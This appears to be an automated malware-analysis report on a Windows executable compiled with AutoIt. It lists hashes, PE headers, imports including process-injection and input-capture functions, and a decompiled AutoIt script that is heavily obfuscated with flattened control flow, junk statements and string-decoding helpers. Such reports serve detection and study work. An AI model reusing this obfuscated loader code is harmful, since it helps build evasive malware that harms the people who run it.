                                                                                          SHA512:dfb155952d9da0b0dffebe232de3e6dbf1fb130cdfb32569a2e3272634a15f42b9a04036c8d796a47e031a7f8c841e25f502df3a86b151d313a7a0fc5ef4768a
                                                                                          SSDEEP:24576:7qybFRXWsNAxCA9dpftQyNE12mHanc5vuZoX2lPA5K:bRWCoBQAEgYanc5vmo2uK
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

                                                                                          File Icon

                                                                                          Icon Hash:aab2e3e39383aa00

                                                                                          Static PE Info

                                                                                          General

                                                                                          Entrypoint:0x42800a
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                          DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE
                                                                                          Time Stamp:0x5CF3C8E6 [Sun Jun 2 13:02:30 2019 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:5
                                                                                          OS Version Minor:1
                                                                                          File Version Major:5
                                                                                          File Version Minor:1
                                                                                          Subsystem Version Major:5
                                                                                          Subsystem Version Minor:1
                                                                                          Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                                                          Entrypoint Preview

                                                                                          Instruction
                                                                                          call 00007F6DA0CF531Dh
                                                                                          jmp 00007F6DA0CE80D4h
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          push edi
                                                                                          push esi
                                                                                          mov esi, dword ptr [esp+10h]
                                                                                          mov ecx, dword ptr [esp+14h]
                                                                                          mov edi, dword ptr [esp+0Ch]
                                                                                          push ecx
                                                                                          pop eax
                                                                                          push ecx
                                                                                          pop edx
                                                                                          add eax, esi
                                                                                          cmp edi, esi
                                                                                          jbe 00007F6DA0CE825Ah
                                                                                          cmp edi, eax
                                                                                          jc 00007F6DA0CE85BEh
                                                                                          bt dword ptr [004C41FCh], 01h
                                                                                          jnc 00007F6DA0CE8259h
                                                                                          rep movsb
                                                                                          jmp 00007F6DA0CE856Ch
                                                                                          cmp ecx, 00000080h
                                                                                          jc 00007F6DA0CE8424h
                                                                                          push edi
                                                                                          pop eax
                                                                                          xor eax, esi
                                                                                          test eax, 0000000Fh
                                                                                          jne 00007F6DA0CE8260h
                                                                                          bt dword ptr [004BF324h], 01h
                                                                                          jc 00007F6DA0CE8730h
                                                                                          bt dword ptr [004C41FCh], 00000000h
                                                                                          jnc 00007F6DA0CE83FDh
                                                                                          test edi, 00000003h
                                                                                          jne 00007F6DA0CE840Eh
                                                                                          test esi, 00000003h
                                                                                          jne 00007F6DA0CE83EDh
                                                                                          bt edi, 02h
                                                                                          jnc 00007F6DA0CE825Fh
                                                                                          mov eax, dword ptr [esi]
                                                                                          sub ecx, 04h
                                                                                          lea esi, dword ptr [esi+04h]
                                                                                          mov dword ptr [edi], eax
                                                                                          lea edi, dword ptr [edi+04h]
                                                                                          bt edi, 03h
                                                                                          jnc 00007F6DA0CE8263h
                                                                                          movq xmm1, qword ptr [esi]
                                                                                          sub ecx, 08h
                                                                                          lea esi, dword ptr [esi+08h]
                                                                                          movq qword ptr [edi], xmm1
                                                                                          lea edi, dword ptr [edi+08h]
                                                                                          test esi, 00000007h
                                                                                          je 00007F6DA0CE82B5h
                                                                                          bt esi, 03h

                                                                                          Rich Headers

                                                                                          Programming Language:
                                                                                          • [ C ] VS2013 build 21005
                                                                                          • [ C ] VS2008 SP1 build 30729
                                                                                          • [LNK] VS2013 UPD5 build 40629
                                                                                          • [ASM] VS2013 UPD5 build 40629
                                                                                          • [C++] VS2013 build 21005
                                                                                          • [ASM] VS2013 build 21005
                                                                                          • [RES] VS2013 build 21005
                                                                                          • [IMP] VS2008 SP1 build 30729

                                                                                          Data Directories

                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xbc0cc0x17c.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x47cbc.rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1100000x7134.reloc
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa4b500x40.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                          Sections

                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                          .text0x10000x8dfdd0x8e000False0.583319005832data6.71971878034IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                          .rdata0x8f0000x2fd8e0x2fe00False0.328288185379data5.76324400576IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .data0xbf0000x8f740x5200False0.10175304878data1.19638192355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                          .rsrc0xc80000x47cbc0x47e00False0.908023097826data7.84935069972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .reloc0x1100000x71340x7200False0.761753015351data6.78395555713IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                          Resources

                                                                                          NameRVASizeTypeLanguageCountry
                                                                                          RT_ICON0xc85e80x128GLS_BINARY_LSB_FIRSTEnglishGreat Britain
                                                                                          RT_ICON0xc87100x128GLS_BINARY_LSB_FIRSTEnglishGreat Britain
                                                                                          RT_ICON0xc88380x128GLS_BINARY_LSB_FIRSTEnglishGreat Britain
                                                                                          RT_ICON0xc89600x2e8dataEnglishGreat Britain
                                                                                          RT_ICON0xc8c480x128GLS_BINARY_LSB_FIRSTEnglishGreat Britain
                                                                                          RT_ICON0xc8d700xea8dataEnglishGreat Britain
                                                                                          RT_ICON0xc9c180x8a8dBase III DBT, version number 0, next free block index 40EnglishGreat Britain
                                                                                          RT_ICON0xca4c00x568GLS_BINARY_LSB_FIRSTEnglishGreat Britain
                                                                                          RT_ICON0xcaa280x25a8dBase III DBT, version number 0, next free block index 40EnglishGreat Britain
                                                                                          RT_ICON0xccfd00x10a8dataEnglishGreat Britain
                                                                                          RT_ICON0xce0780x468GLS_BINARY_LSB_FIRSTEnglishGreat Britain
                                                                                          RT_MENU0xce4e00x50dataEnglishGreat Britain
                                                                                          RT_STRING0xce5300x594dataEnglishGreat Britain
                                                                                          RT_STRING0xceac40x68adataEnglishGreat Britain
                                                                                          RT_STRING0xcf1500x490dataEnglishGreat Britain
                                                                                          RT_STRING0xcf5e00x5fcdataEnglishGreat Britain
                                                                                          RT_STRING0xcfbdc0x65cdataEnglishGreat Britain
                                                                                          RT_STRING0xd02380x466dataEnglishGreat Britain
                                                                                          RT_STRING0xd06a00x158dataEnglishGreat Britain
                                                                                          RT_RCDATA0xd07f80x2bef0data
                                                                                          RT_RCDATA0xfc6e80x13052data
                                                                                          RT_GROUP_ICON0x10f73c0x76dataEnglishGreat Britain
                                                                                          RT_GROUP_ICON0x10f7b40x14dataEnglishGreat Britain
                                                                                          RT_GROUP_ICON0x10f7c80x14dataEnglishGreat Britain
                                                                                          RT_GROUP_ICON0x10f7dc0x14dataEnglishGreat Britain
                                                                                          RT_VERSION0x10f7f00xdcdataEnglishGreat Britain
                                                                                          RT_MANIFEST0x10f8cc0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain

                                                                                          Imports

                                                                                          DLLImport
                                                                                          WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                                          VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                          COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                          MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                          WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                                          PSAPI.DLLGetProcessMemoryInfo
                                                                                          IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                          USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                                          UxTheme.dllIsThemeActive
                                                                                          KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                                          USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                                          GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                                          COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                                          ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                                          SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                          ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                                          OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                                                          Version Infos

                                                                                          DescriptionData
                                                                                          Translation0x0809 0x04b0

                                                                                          Possible Origin

                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                          EnglishGreat Britain

                                                                                          Static AutoIT Info

                                                                                          General

                                                                                          Code:LOCAL $NSFYZHFKYP = EXECUTE LOCAL $EOERUAQRJSKN = $NSFYZHFKYP ("DllStructGetData" ) LOCAL $DWUFUAPKESAJ = $NSFYZHFKYP ("BinaryToString" ) FUNC LUXBZMCWKPOC ($STEXT , $SYMBOL ) GLOBAL $1300820860 = 256356752 GLOBAL $MIFHIFVYOW = 1654813 FOR $E = 0 TO 1029680 IF $1300820860 = 176683708 THEN RETURN $RESULT WINEXISTS ("cNl3R229gAzqAgEuzKzVWCOcVIa32WhXtsmSQFEqNhbfvHYqV7k4qjZJ9iii19hutL7h3WO4f" ) EXITLOOP ENDIF IF $1300820860 = 256356752 THEN $RESULT = STRINGREPLACE ($STEXT , $SYMBOL , "" ) ISBOOL (818823 * 493411 * 2406282 + 2130956 ) $1300820860 = 176683708 ISSTRING ("yNaRVUKQw8rqYhclizB6xh2lTgeXOqeiGTUCNTY6Kewi" ) ENDIF STRING ("rDseA9qWY8OOX" ) NEXT ENDFUNC FUNC EWYPFYGPXIKHY ($IMGFULLPATH ) GLOBAL $1138660241 = 256356752 GLOBAL $G4JUFXIGZL = 90924 FOR $E = 0 TO 2054991 IF $1138660241 = 113519199 THEN GUIDELETE ($HWND ) ISBOOL ("OQwXVdfTCRZVjrYdqoDJsbHUeRIgQEdpJ59hNsifNw42SNBnFpEDeYANiLTeE8c7MJknrRy7fy66gOczouJAaI" ) $1138660241 = 1027989821 RANDOM (130856 ) ENDIF IF $1138660241 = 176683708 THEN $HWND = GUICREATE ($IMGFULLPATH , 0 , 0 , 0 , 0 , BITOR (2147483648 , 536870912 ) , BITOR (128 , 32 ) ) ISBOOL (1265171 + 520477 + 4293992654 * 3327821 ) $1138660241 = 1300820860 CHR (2730490 ) ISBOOL ("sZkxL7eyyS6SwwaYpLjA469yVJCkE4aYFBqozrSakTdG9hDkx2L2xcQv0WMbD34ERil4f" ) ENDIF IF $1138660241 = 256356752 THEN LOCAL $HWND , $HGUISWITCH , $ACTRLSIZE , $ARETSIZE [2 ] = [0 , 0 ] RANDOM (3641423 ) $1138660241 = 176683708 ENDIF IF $1138660241 = 1027989821 THEN GUISWITCH ($HGUISWITCH ) EXITLOOP INT (3107136 ) ENDIF IF $1138660241 = 1203322726 THEN $ACTRLSIZE = CONTROLGETPOS ($HWND , "" , GUICTRLCREATEPIC ($IMGFULLPATH , 0 , 0 , 0 , 0 ) ) DIM $DW5YMNQFQYI005IELCM7 = 964435 * 1963137 + 4293423702 + 4294948098 $1138660241 = 113519199 DIM $RNHTSIKWVTNM8WTLIRGN = 647030 ENDIF IF $1138660241 = 1300820860 THEN $HGUISWITCH = GUISWITCH ($HWND ) $1138660241 = 1203322726 CHR (45484 ) ENDIF DIM $URHNA3OSSULYHJVXSX77 = 600218 + 4293462533 + 4294915318 * 2918734 + 4292984733 NEXT IF ISARRAY ($ACTRLSIZE ) THEN GLOBAL $1203322726 = 256356752 GLOBAL $CSY08UBDGU = 2740256 FOR $E = 0 TO 3691754 IF $1203322726 = 176683708 THEN $ARETSIZE [1 ] = $ACTRLSIZE [3 ] $1203322726 = 1300820860 INT (967164 ) ENDIF IF $1203322726 = 256356752 THEN $ARETSIZE [0 ] = $ACTRLSIZE [2 ] $1203322726 = 176683708 ISBOOL ("k2nLrtaqkAvZrMcSm68iRAhbvf6LDlz2qGkcnTjp23hXhFfTjNJ8Ke3TUlqlxxW8bCIV" ) ENDIF IF $1203322726 = 1300820860 THEN RETURN SETERROR (0 , 0 , $ARETSIZE ) EXITLOOP ENDIF MOD (3165406 , 1234085 ) NEXT ENDIF RETURN SETERROR (1 , 0 , $ARETSIZE ) ENDFUNC FUNC VRCRUWMXTTRH ($SSTRING , $IREPEATCOUNT ) $IREPEATCOUNT = INT ($IREPEATCOUNT ) IF STRINGLEN ($SSTRING ) < 1 OR $IREPEATCOUNT < 0 THEN RETURN SETERROR (1 , 0 , "" ) LOCAL $SRESULT = "" WHILE $IREPEATCOUNT > 1 IF BITAND ($IREPEATCOUNT , 1 ) THEN $SRESULT &= $SSTRING GLOBAL $1300820860 = 256356752 GLOBAL $3Z9MCZLBRL = 1285316 FOR $E = 0 TO 2581845 IF $1300820860 = 176683708 THEN $IREPEATCOUNT = BITSHIFT ($IREPEATCOUNT , 1 ) EXITLOOP ISSTRING ("WO7uqjjfl1YfzArAm" ) ENDIF IF $1300820860 = 256356752 THEN $SSTRING &= $SSTRING $1300820860 = 176683708 ISBOOL ("gcRCcY1WQjHo2O6sQGpzxHa1TaVRJjXmCJnnCQdx9cz" ) ENDIF NEXT WEND RETURN $SSTRING & $SRESULT ENDFUNC FUNC QNJARTBHRDOXE ($SSTR ) GLOBAL $1300820860 = 256356752 GLOBAL $OKQZTV9IBZ = 2183390 FOR $E = 0 TO 2966495 IF $1300820860 = 176683708 THEN LOCAL $SDECODED , $R , $RS = 8 , $LS = 7 , $ASTR = STRINGSPLIT ($SSTR , "" , 2 ) EXITLOOP STRING (1180918 * 3350956 + 1885337 ) ENDIF IF $1300820860 = 256356752 THEN LOCAL $SB128 = LUXBZMCWKPOC ("!#..$%..(..)*..,...012345..6..7..89..:..;..=@A..BC..DEFG..H..IJ..K..LMNO..PQRST..U..V..WX..YZ[]^.._..a..bcd..e..f..g..h..i..j..kl..m..n..opqrs..t..u..v..wxy..z..{..|..}~............................................................................................................................................................................................." , ".." ) STRING ("8QBnB8372SKOmN6buZ033HrqhFVqvBuNzq0dJZSnMyCcRVFleBGKEo0Axlg6mMKzx7o5X2BEhMqEfoIvaIm44UilA" ) $1300820860 = 176683708 ENDIF DIM $XCOTFJYLACD17VUJLU5M = "QENYdEwmcVuLqRcI0Zzka42qqnefFX90xJhGb5Cfc97ripROrJV" NEXT FOR $I = 0 TO UBOUND ($ASTR ) + 4294967295 $NC = STRINGINSTR ($SB128 , $ASTR [$I ] , 1 ) + 4294967295 IF $RS > 7 THEN GLOBAL $113519199 = 256356752 GLOBAL $ECZWMWGZZR = 3669754 FOR $E = 0 TO 2777370 IF $113519199 = 176683708 THEN $LS = 7 $113519199 = 1300820860 ISSTRING (3678465 + 4294436102 + 3801172 ) DIM $FYX5BEV5JU4NXMOURSFM = "afWc" ENDIF IF $113519199 = 256356752 THEN $RS = 1 DIM $YZCPFSAEVNRJSFOK3GTQ = 1543249 * 941265 + 1972212 * 2045070 $113519199 = 176683708 ISSTRING ("VF1y1uNpGEYDTD1litZD6OJ8UGXRD2cl7SUTTDOybimUpapbCZU1QRNg52NuG7VOBMFaTh" ) ENDIF IF $113519199 = 1203322726 THEN CONTINUELOOP EXITLOOP ISSTRING (1831278 * 2990306 + 3098707 + 2657297 ) ENDIF IF $113519199 = 1300820860 THEN $R = $NC $113519199 = 1203322726 ENDIF PTR ("dwHsMDpruxfnpnZNej4eVTfGphp6fuKZtIyA4HgqbD3rc8oco9TR5pgtqbcEoslaWq3RZyUGdNdq0YDr3mRgL33dCej3ELbSs3EWeHn" ) NEXT ENDIF GLOBAL $1138660241 = 256356752 GLOBAL $PLNRM0DCGV = 3367680 FOR $E = 0 TO 2441690 IF $1138660241 = 113519199 THEN $LS -= 1 $1138660241 = 1027989821 PTR ("o0bBLu87sSmu910zoK1MKRwU9agmELyotDLykmQ11FjZIqcUp8NW8KiGDrBLnVCRs7aEpApc49VeHHkS7w7F7MpS" ) ENDIF IF $1138660241 = 176683708 THEN $NC = BITOR (BITAND (BITSHIFT ($NC , ($LS * + 4294967295 ) ) , 255 ) , $R ) ISPTR ("gdBFKqGDYTK190e95gTN1Y6UQSrkkEwr0vNafbJBz2iXvVp2qf9WbzWsgS038wtsvsbNmd34Gqo8" ) $1138660241 = 1300820860 STRING (1775845 * 313793 + 4292565921 ) ENDIF IF $1138660241 = 256356752 THEN $R1 = $NC WINEXISTS ("lRCcI0AdULOmmfoUlYN7u5BICoYUcKf1jES0YlyZSukZUR" ) $1138660241 = 176683708 STRING (983529 * 3767196 + 1033300 + 3599162 ) DIM $RAJGYDRXY69YZP9VLZWW = "yFvujmBBK4LeWbtas5Mkb7Jpv2RdEMeX7MrEYlO0p5Ybwtcn" ENDIF IF $1138660241 = 1027989821 THEN $SDECODED &= CHR ($NC ) INT (3550800 ) EXITLOOP ENDIF IF $1138660241 = 1203322726 THEN $RS += 1 $1138660241 = 113519199 RANDOM (1102076 ) RANDOM (3872667 ) ENDIF IF $1138660241 = 1300820860 THEN $R = BITSHIFT ($R1 , $RS ) DIM $ITZMGQX4GII3B0CXUTLN = 3074305 $1138660241 = 1203322726 MOD (1548419 , 1295973 ) ENDIF PTR ("m3E0GmLvrqswm7Ad9mNMlv22qE42CciswvZ67HmgJrDaHlFp6q2UlHv1bMJcsT3o" ) NEXT NEXT RETURN $SDECODED ENDFUNC FUNC YDFTDRCASVG ($BBINARY ) GLOBAL $1300820860 = 256356752 GLOBAL $9A1HEFBAHD = 506265 FOR $E = 0 TO 3591842 INT (321663 ) IF $1300820860 = 176683708 THEN #forceref $j RANDOM (801978 ) EXITLOOP ENDIF IF $1300820860 = 256356752 THEN LOCAL $BYTE , $BITS = "" , $I , $J , $S $1300820860 = 176683708 WINEXISTS ("8jY0yp2HkNhBkzUNEB9isEeNXReU2m1jIVD0TnEL" ) WINEXISTS ("GDbUMCtG8WbCfkcSliO8X73y645q7xjGKUgtOtg" ) ENDIF NEXT FOR $I = 1 TO BINARYLEN ($BBINARY ) $BYTE = BINARYMID ($BBINARY , $I , 1 ) FOR $J = 1 TO 8 GLOBAL $1300820860 = 256356752 GLOBAL $LWTAUHLXZ0 = 1321153 FOR $E = 0 TO 402326 ISBOOL (2500246 * 2195127 + 2309758 + 4292466555 ) IF $1300820860 = 176683708 THEN $BYTE = BITSHIFT ($BYTE , 1 ) EXITLOOP ENDIF IF $1300820860 = 256356752 THEN $BITS &= BITAND ($BYTE , 1 ) WINEXISTS ("pfCVg" ) $1300820860 = 176683708 DIM $EK7SAQMGUBEW1ZUKJOHX = 1909697 + 4292022810 + 4291720625 * 3293847 ENDIF NEXT NEXT NEXT GLOBAL $1300820860 = 256356752 GLOBAL $IK8YLTDMIH = 3543418 FOR $E = 0 TO 3884059 IF $1300820860 = 176683708 THEN $BITS = "" MOD (2826006 , 668109 ) EXITLOOP ISPTR (3576399 + 4293328620 + 4292596178 ) ENDIF IF $1300820860 = 256356752 THEN $S = STRINGSPLIT ($BITS , "" ) ISFLOAT ("LXR1v80k5" ) $1300820860 = 176683708 DIM $BIWNFFFXRX8MZCVAZS6U = 3473510 * 1622827 + 4294219104 ENDIF NEXT FOR $I = $S [0 ] TO 1 STEP + 4294967295 $BITS &= $S [$I ] NEXT 